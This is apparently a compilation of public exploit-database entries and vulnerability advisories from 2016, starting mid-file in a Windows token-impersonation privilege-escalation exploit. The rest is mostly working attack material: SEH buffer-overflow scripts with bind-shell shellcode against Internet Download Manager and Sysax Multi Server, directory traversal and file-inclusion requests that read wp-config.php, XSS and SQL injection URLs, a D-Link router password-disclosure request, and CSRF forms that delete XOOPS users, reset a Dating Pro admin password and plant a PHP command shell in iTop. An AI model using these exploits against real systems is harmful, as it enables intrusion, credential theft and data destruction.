printf("Error impersonating thread %08X\n", status);
exit(1);
}
HANDLE hToken;
if (!OpenThreadToken(hThread, TOKEN_DUPLICATE | TOKEN_IMPERSONATE,
FALSE, &hToken))
{
printf("Error opening thread token: %d\n", GetLastError());
ResumeThread(hThread);
exit(1);
}
ResumeThread(hThread);
return hToken;
}
struct ThreadArg
{
HANDLE hThread;
HANDLE hToken;
};
DWORD CALLBACK SetTokenThread(LPVOID lpArg)
{
ThreadArg* arg = (ThreadArg*)lpArg;
while (true)
{
if (!SetThreadToken(&arg->hThread, arg->hToken))
{
printf("Error setting token: %d\n", GetLastError());
break;
}
}
return 0;
}
int main()
{
std::map<DWORD, HANDLE> thread_handles;
printf("Gathering thread handles\n");
for (int i = 0; i < MAX_PROCESSES; ++i) {
HANDLE hThread = GetThreadHandle();
DWORD dwTid = GetThreadId(hThread);
if (!dwTid)
{
printf("Handle not a thread: %d\n", GetLastError());
exit(1);
}
if (thread_handles.find(dwTid) == thread_handles.end())
{
thread_handles[dwTid] = hThread;
}
else
{
CloseHandle(hThread);
}
}
printf("Done, got %zd handles\n", thread_handles.size());
if (thread_handles.size() > 0)
{
HANDLE hToken = GetSystemToken(thread_handles.begin()->second);
printf("System Token: %p\n", hToken);
for (const auto& pair : thread_handles)
{
ThreadArg* arg = new ThreadArg;
arg->hThread = pair.second;
DuplicateToken(hToken, SecurityImpersonation, &arg->hToken);
CreateThread(nullptr, 0, SetTokenThread, arg, 0, nullptr);
}
while (true)
{
PROCESS_INFORMATION procInfo = {};
STARTUPINFO startInfo = {};
startInfo.cb = sizeof(startInfo);
if (CreateProcessWithLogonW(L"test", L"test", L"test",
LOGON_NETCREDENTIALS_ONLY, nullptr,
L"cmd.exe", CREATE_SUSPENDED, nullptr, nullptr,
&startInfo, &procInfo))
{
HANDLE hProcessToken;
// If we can't get process token good chance it's a system process.
if (!OpenProcessToken(procInfo.hProcess, MAXIMUM_ALLOWED,
&hProcessToken))
{
printf("Couldn't open process token %d\n", GetLastError());
ResumeThread(procInfo.hThread);
break;
}
// Just to be sure let's check the process token isn't elevated.
TOKEN_ELEVATION elevation;
DWORD dwSize = 0;
if (!GetTokenInformation(hProcessToken, TokenElevation,
&elevation, sizeof(elevation), &dwSize))
{
printf("Couldn't get token elevation: %d\n", GetLastError());
ResumeThread(procInfo.hThread);
break;
}
if (elevation.TokenIsElevated)
{
printf("Created elevated process\n");
break;
}
TerminateProcess(procInfo.hProcess, 1);
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
}
}
}
return 0;
}
# Exploit Title: Wordpress Import CSV | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
# Stable Tag: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
======================================
[PoC]
======================================
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
Click on the link "From an url".
In "URL" field to write "../../../wp-config.php".
Validate form and inspect the body.
======================================
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
# Vulnerable File : abtest_admin.php
<?php
require 'admin/functions.php';
if (isset($_GET['action'])) {
include 'admin/' . $_GET['action'] . '.php';
} else {
include 'admin/list_experiments.php';
}
?>
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
# Pics : http://i.imgur.com/jZFKYOc.png
#!/usr/bin/python
# Exploit Title: Internet Download Manager 6.25 Build 14 - 'Find file' SEH Buffer Overflow (Unicode)
# Date: 20-3-2016
# Exploit Author: Rakan Alotaibi
# Contact: https://twitter.com/hxteam
# Software Link: http://mirror2.internetdownloadmanager.com/idman625build14.exe
# Tested on: Windows 7 SP1 x86
# How to exploit: IDM > Downloads > Find > paste exploit string into 'Find file' textbox
tag = "AvAv"
# msfvenom -p windows/shell_bind_tcp lport=4444 -e x86/unicode_upper BufferRegister=EAX
shellcode = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J"
"BKL9XU2M0KPM0QP3YZENQ7PQTTKR0NPDKR2LLDKQBN44KSBMXLO7GOZO601KO6LO"
"LS1SLM2NLMP7Q8OLMKQY7IRZR1BQG4K22N04K0JOLDK0LN1SHJC0HM18Q0Q4K0YO"
"0KQ9CTKOYLX9SNZQ94KNTDKKQ8V01KOVLGQ8OLMKQY708K0D5KFLC3MKHOKCMNDD"
"5ZD0X4KB8O4M1IC2F4KLL0KTKPXMLKQICDKKTDKKQJ0SY0DO4NDQK1KS1QIPZ21K"
"OK01O1O1JDKMBZKTM1M2HP3OBKPKP1XT7SCNR1OB42H0LCGO6LGKOIEH860M1M0K"
"PMYXD1DPPQXMY3PBKKPKOHU2JKXR9R0IRKMQ0R0Q00PQXJJLO9OIPKOIE4WQXM2K"
"PN11L4IYVQZLPQFPWS8XBIKNW1WKOHU0WRHWG9YOHKOKO8U27BHD4ZLOKYQKOYE0"
"W671X2UBNPMS1KOYEBH2C2MRDM0TIIS27QG0WP1ZVBJLR29PVK2KM3697PDNDOLK"
"QM1TM14NDLPWVKP14QD0PQF26PVOV26PNQFR6QC26QXBYXLOO3VKO9E3YK00NB6O"
"VKOP0QXKX57MMC0KOZ5WKL0FUFBB6QX5V5E7MEMKOXUOLKV3LKZ3PKKIP45M57KP"
"GMCCB2OBJKPQCKO9EAA")
# Windows NtAccessCheckAndAuditAlarm EggHunter
# Size: 32 bytes
egghunter = (
"PPYAIAIAIAIAQATA"
"XAZAPA3QADAZABAR"
"ALAYAIAQAIAQAPA5"
"AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBA"
"BABABAB30APB944J"
"BQV51HJKOLOPBR2Q"
"ZKRPXXMNNOLKUPZ2"
"TJOWHKPOQKPT6DKJ"
"ZVOT5ZJVOBUK7KOK"
"7LJA")
buffersize = 6000
nseh = "\x61\x47" # popad + venetian pad
seh = "\x8d\x51" # 0x0051008d: pop edi # pop esi # ret [IDMan.exe]
venalign = (
"\x47" # venetian pad
"\x55" # push ebp
"\x47" # venetian pad
"\x58" # pop eax
"\x47" # venetian pad
"\x05\x18\x11" # add eax,11001800
"\x47" # venetian pad
"\x2d\x17\x11" # sub eax,11001700
"\x47" # venetian pad
"\x50" # push eax
"\x47" # venetian pad
"\xc3" # ret
)
venalign2 = (
"\x43" # venetian pad
"\x47" # inc edi
"\x43" # venetian pad
"\x57" # push edi
"\x43" # venetian pad
"\x58" # pop eax
"\x43" # venetian pad
"\x05\x18\x11" # add eax,11001800
"\x43" # venetian pad
"\x2d\x17\x11" # sub eax,11001700
"\x43" # venetian pad
"\x50" # push eax
"\x43" # venetian pad
"\xc3" # ret
)
junk2 = "\x71" * 108
junk3 = "\x71" * 110
evil2 = tag + venalign2 + junk3 + shellcode
junk = "\x42" * (2192-(len(evil2)))
evil = junk + evil2 + nseh + seh + venalign + junk2 + egghunter
fill = "\x47" * (buffersize-len(evil))
buffer = evil + fill
filename = "exploit.txt"
file = open(filename, 'w')
file.write(buffer)
file.close()
print buffer
print "[+] File created successfully"
Exploit Title: DORG - Disc Organization System SQL Injection And Cross Site Scripting
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016
SQL Injection:
link: http://localhost/dorg/results.php?q=3&search=%2527&type=3
Screenshot: http://secupent.com/exploit/images/drogsql.jpg
Cross Site Scripting (XSS):
link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3
Screenshot: http://secupent.com/exploit/images/drogxss.jpg
<!--
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===================================
CSRF - Arbitrary User Deletions
Vulnerability Details:
=====================
Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL
users from the Xoops database.
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
=============
Following CSRF attack delete all users from database, following POC code
will sequentially delete 100 users from the Xoops application.
-->
<iframe name="ifrm" style="display:none" name="hidden-form"></iframe>
<form target="ifrm" name='memberslist' id='CSRF' action='
http://localhost/xoops-2.5.7.2/htdocs/modules/system/admin.php?fct=users'
method='POST'>
<input type="hidden" id="ids" name="memberslist_id[]" />
<input type="hidden" name="fct" value="users" />
<input type="hidden" name="edit_group" value="" />
<input type="hidden" name="selgroups" value="" />
<input type="hidden" name="op" value="users_add_delete_group" />
<input type="hidden" name="op" value="action_group" />
<input type="hidden" name="Submit" value="Submit+Query" />
</form>
<script>
var c=-1
var amttodelete=100
var id=document.getElementById("ids")
var frm=document.getElementById("CSRF")
function doit(){
c++
arguments[1].value=c
arguments[0].submit()
if(c>=amttodelete){
clearInterval(si)
alert("Done!")
}
}
var si=setInterval(doit, 1000, frm, id)
</script>
<!--
Disclosure Date:
==================================
Jan 29, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
=================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.
-->
D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: D-Link DWR-932
Tested Version: Firmware V4.00(EU)b03
Vendor: D-Link http://www.dlink.com/
Product URL: http://www.dlink.com/uk/en/home-solutions/work/personal-hotspots/dwr-932-4g-lte-mobile-wi-fi-hotspot-150-mbps
Date: 20 Mar 2016
About Product:
---------------
The DWR-932 4G LTE Mobile Wi-Fi Hotspot 150 Mbps is a 4G/LTE Cat4 high speed broadband Wi-Fi mobile hotspot. The DWR-932 uses a 4G Internet connection to give you a simple and fast Wi-Fi network anywhere you need.
Vulnerability Details:
----------------------
The Cgi Script "/cgi-bin/dget.cgi" handles most of user side and server side requests, but there is no observation on requests recieved from unauthorized users.
so the attacker will be able to view Adminitrative or Wifi Password in clear text by visiting below URLs.
View Admin Username and Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807
Output:
{ "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }
View Wifi Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703
Output:
{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }
Export All Configurations:
http://192.168.0.1/cgi-bin/export_cfg.cgi
#EOF
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===========================
Directory Traversal Bypass
Vulnerability Details:
=====================
Xoops 2.5.7.2 has checks to defend against directory traversal attacks.
However, they can be easily bypassed by simply issuing "..././" instead of
"../"
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
==============
In Xoops code in 'protector.php' the following check is made for dot dot
slash "../" in HTTP requests
/////////////////////////////////////////////////////////////////////////////////
if( is_array( $_GET[ $key ] ) ) continue ;
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
$this->last_error_type = 'DirTraversal' ;
$this->message .= "Directory Traversal '$val' found.\n" ;
////////////////////////////////////////////////////////////////////////////////
The above Xoops directory traversal check can be defeated by using
..././..././..././..././
you can test the theory by using example below test case by supplying
..././ to GET param.
$val=$_GET['c'];
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
echo "traversal!";
}else{
echo "ok!" . $val;
}
Disclosure Date:
==================================
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
==================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.
# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
# Date: 03/21/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.sysax.com/
# Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
# Version: Sysax Multi Server 6.50
# Tested on: Windows XP SP3 English
# Category: Remote Code Execution
#
# Timeline: 03/11/16 Bug found
# 03/14/16 Vender notified
# 03/17/16 Vender acknowledges issue and publishes patch (6.51)
# 03/21/16 Exploit Published
#
# Summary: This is a post authentication exploit that requires the HTTP file sharing service to be running on
# Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
# service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_
# in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though
# the user will need to have permission to delete folders. If the user has file delete permissions, file_
# will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
# be modified to adapt to a users permissions.
import httplib
target = 'webbackup'
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm
#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"
shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
"\x83\xd7\xfd\x8c\x3c")
arg="folder_" #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well
junk1="A"*26400 #Initial pile of junk
noppad="\x90"*296 #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell)) #Fill in after our shellcode till nseh
nseh="\xeb\x06\x90\x90" #Short jump over SEH
seh="\xd7\x2a\x92\x5d" #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode
junk2="D"*9500 #Junk at the end
buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)
head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)
# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost
download.php file code:
<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
$file = $_GET['file'];
header( 'Content-Type: application/zip' );
header( 'Content-Disposition: attachment; filename="' . $file . '"' );
readfile( $file );
unlink( $file );
exit;
}
?>
Proof of concept:
Note that because of the unlink, we potentially can destroy the wordpress core.
Simply add the get parameter file:
localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
Found by AMAR^SHG (Shkupi Hackers Group)
Advisory ID: HTB23293
Product: iTop
Vendor: Combodo
Vulnerable Version(s): 2.2.1 and probably prior
Tested Version: 2.2.1
Advisory Publication: February 10, 2016 [without technical details]
Vendor Notification: February 10, 2016
Vendor Patch: February 11, 2016
Public Disclosure: March 18, 2016
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter.
A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information.
The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file.
CSRF exploit will inject the following PHP code into iTop configuration file:
<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>
To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit code into it:
<form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="prev_config" value="1">
<input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>">
<input value="submit" id="btn" type="submit" />
</form>
Then login to iTop website with admin account and open the file in your browser.
After successful exploitation an attacker can run arbitrary system commands using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" directory listing command:
http://[host]/pages/UI.php?cmd=ls
-----------------------------------------------------------------------------------------------
Solution:
Replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision from SVN, then run the setup again.
More Information:
https://sourceforge.net/p/itop/tickets/1202/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23293 - https://www.htbridge.com/advisory/HTB23293 - RCE via CSRF in iTop
[2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Advisory ID: HTB23294
Product: Dating Pro
Vendor: DatingPro
Vulnerable Version(s): Genie (2015.7) and probably prior
Tested Version: Genie (2015.7)
Advisory Publication: February 10, 2016 [without technical details]
Vendor Notification: February 10, 2016
Vendor Patch: February 29, 2016
Public Disclosure: March 18, 2016
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: Critical
CVSSv3 Base Scores: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H], 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple Cross-Site Request Forgery (CSRF) vulnerabilities in a popular dating social network Dating Pro.
A remote unauthenticated attacker can perform CSRF attacks to change administrator’s credentials and execute arbitrary system commands. Successful exploitation of the vulnerability may allow attacker to gain complete control over the vulnerable website, all its users and databases.
1) CSRF in "/admin/ausers/index"
The vulnerability exists due to the absence of validation of HTTP request origin in "/admin/ausers/index" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and change login, email address and password of the current website administrator. This means a total takeover of the website.
A simple CSRF exploit below will change login, email and password to "admin", "admin@mail.com" and "123456" respectively.
To reproduce the vulnerability, just create an empty HTML file, paste the CSRF exploit code into it, login to iTop website and open the file in your browser:
<form action="http://[host]/admin/ausers/index" method="post" name="main">
<input type="hidden" name="nickname" value="admin">
<input type="hidden" name="email" value="admin@mail.com">
<input type="hidden" name="update_password" value="1">
<input type="hidden" name="password" value="123456">
<input type="hidden" name="repassword" value="123456">
<input type="hidden" name="name" value="admin">
<input type="hidden" name="description" value="">
<input type="hidden" name="btn_save" value="Save">
<input value="submit" id="btn" type="submit" />
</form><script>document.main.submit();</script>
Now you can login as administrator using the above-mentioned credentials.
2) CSRF in /admin/notifications/settings/
The vulnerability exists due to absence of validation of HTTP request origin in "/admin/notifications/settings/" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and execute arbitrary system commands with privileges of the web server.
A simple exploit below will replace full path to sendmail program with the following "cp config.php config.txt" system command that will copy "config.php" file into "config.txt" making its content publicly accessible:
<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<input type="hidden" name="mail_charset" value="utf-8">
<input type="hidden" name="mail_protocol" value="sendmail">
<input type="hidden" name="mail_useragent" value="pg-mailer">
<input type="hidden" name="mail_from_email" value="admin@site.com">
<input type="hidden" name="mail_from_name" value="PgSoftware">
<input type="hidden" name="" value="">
<input type="hidden" name="btn_save" value="Save">
<input type="hidden" name="mail_mailpath" value="cp config.php config.txt ||">
</form><script>document.main.submit();</script>
The command will be executed the next time when any email is being sent by the vulnerable web application.
It is also possible to trigger this event using the following following CSRF exploit:
<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<input type="hidden" name="mail_to_email" value="mail@mail.com">
<input type="hidden" name="btn_test" value="Send">
</form><script>document.main.submit();</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Genie (2015.7) released after February 29, 2016.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23294 - https://www.htbridge.com/advisory/HTB23294 - Admin Password Reset & RCE via CSRF in Dating Pro
[2] Dating Pro - http://www.datingpro.com - Everything you need to start and run a dating business.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.